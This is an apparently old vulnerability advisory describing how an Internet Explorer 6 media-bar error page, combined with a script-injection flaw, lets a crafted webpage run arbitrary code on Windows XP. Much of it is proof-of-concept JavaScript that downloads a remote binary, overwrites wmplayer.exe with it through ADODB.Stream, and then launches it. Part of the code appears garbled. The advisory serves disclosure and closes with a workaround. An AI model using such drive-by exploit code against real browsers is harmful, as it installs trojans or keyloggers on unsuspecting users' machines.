Internet explorer 6 on windows XP allows exection of arbitrary code DESCRIPTION : Yesterday Liu Die Yu released a number series of advisories concerning internet explorer by combining on of these issues with an earlier issue I myself reported a while back You can construct a specially crafted webpage that can take any action on a users system including but not limited to, installing trojans, keyloggers, wiping the users harddrive etc. TECHNICAL EXPLAINATION : Internet explorer 6 comes with a media sidebar in wich you can load and play mediaclips without even leaving the browser. when you instruct the mediabar to load a file from an unknown host or the HTTP status returned by an existing host indicates an error this media bar displays an error page inside the media bar namely res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path res URL's are treated as being in the "my computer zone" and are loaded from the users filesystem perfect conditions for the issue I describe on To work. now all that is needed is a way to inject this exploit code into this page This method was graciously provided by Liu Die Yu as you can read on Combining these issues we get something like : --snip-- <textarea id="code" style="display:none;"> var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://"; </textarea> <script language="javascript"> function preparecode(code) { result = ''; lines = code.split(/\r\n/); for (i=0;i<lines.length;i++) { line = lines[i]; line = line.replace(/^\s+/,""); line = line.replace(/\s+$/,""); line = line.replace(/'/g,"\\'"); line = line.replace(/[\\]/g,"\\\\"); line = line.replace(/[/]/g,"%2f"); if (line != '') { result += line +'\\r\\n'; } } return result; } function doit() { mycode = preparecode(document.all.code.value); myURL = "file:javascript:eval('" + mycode + "')";,"_media") }"error.jsp","_media"); setTimeout("doit()", 5000); </script> --snip-- error.jsp is a jsp page that consists of one line, namely <% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %> DEMONSTRATION : A demonstration is provided at : WORKAROUND : Disable active scripting or do "the sensible thing" and pick another browser such as the excellent mozilla firebird.